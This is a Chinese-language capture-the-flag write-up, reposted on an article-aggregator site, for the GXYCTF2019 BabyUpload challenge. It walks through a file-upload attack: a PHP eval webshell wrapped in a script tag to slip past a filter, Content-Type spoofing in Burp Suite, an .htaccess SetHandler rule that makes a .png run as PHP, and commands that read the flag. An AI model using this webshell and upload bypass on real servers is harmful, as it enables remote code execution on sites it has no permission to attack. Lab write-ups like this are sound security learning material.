[GXYCTF2019]BabyUpload
2022/1/15 23:06:47
本文主要是介绍[GXYCTF2019]BabyUpload,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
CTF小白试图写一些细到极致的wp来给健忘的自己看_(:з」∠)_
看到上传文件就刨出了一句话木马:
<script language="php">
eval($_POST['a']);
</script>
顺便绕过了<?过滤,歪打正着了属于是
然后发现文件后缀名还过滤了ph,改成png啥的都ok
直接上传显示文件类型太露骨,在Burp Suite里面修改Content-Type: image/jpeg,显示成功上传,然而打开对应目录只有一张不能显示的图片,蚁剑也连不上
看报错信息发现是apache服务器,从大佬的wp得知了原来有上传漏洞= =
见:利用.htaccess文件攻击上传Shell
于是先上传.htaccess文件,内容:
<FilesMatch "1.png">
SetHandler application/x-httpd-php
</FilesMatch>
注意FilesMatch后面跟的是稍后要上传的一句话木马文件名称/后缀名!!!
记得修改Content-Type: image/jpeg,不然上传不了
然后上传1.png,内容:
GIF
<script language="php">
eval($_POST['a']);
</script>
不过其实这道题没有检验文件头= =
蚁剑连接返回的.../upload/..../1.png即可在根目录下找到flag
另外还学了一种,一句话木马采用:
GIF
<script language="php">
assert($_POST['a']);
</script>
这种蚁剑连不上,但是可以用hackbar的post方法
a=system("cat flag");
结果报错,phpinfo()发现禁用了系统函数
然后学到了show_source()函数的用法!神奇!
见:PHP中的show_source()函数
于是:
a=show_source('/flag',false);
得到flag
这篇关于[GXYCTF2019]BabyUpload的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2025-01-05Easysearch 可搜索快照功能,看这篇就够了
- 2025-01-04BOT+EPC模式在基础设施项目中的应用与优势
- 2025-01-03用LangChain构建会检索和搜索的智能聊天机器人指南
- 2025-01-03图像文字理解,OCR、大模型还是多模态模型?PalliGema2在QLoRA技术上的微调与应用
- 2025-01-03混合搜索:用LanceDB实现语义和关键词结合的搜索技术(应用于实际项目)
- 2025-01-03停止思考数据管道,开始构建数据平台:介绍Analytics Engineering Framework
- 2025-01-03如果 Azure-Samples/aks-store-demo 使用了 Score 会怎样?
- 2025-01-03Apache Flink概述:实时数据处理的利器
- 2025-01-01使用 SVN合并操作时,怎么解决冲突的情况?-icode9专业技术文章分享
- 2025-01-01告别Anaconda?试试这些替代品吧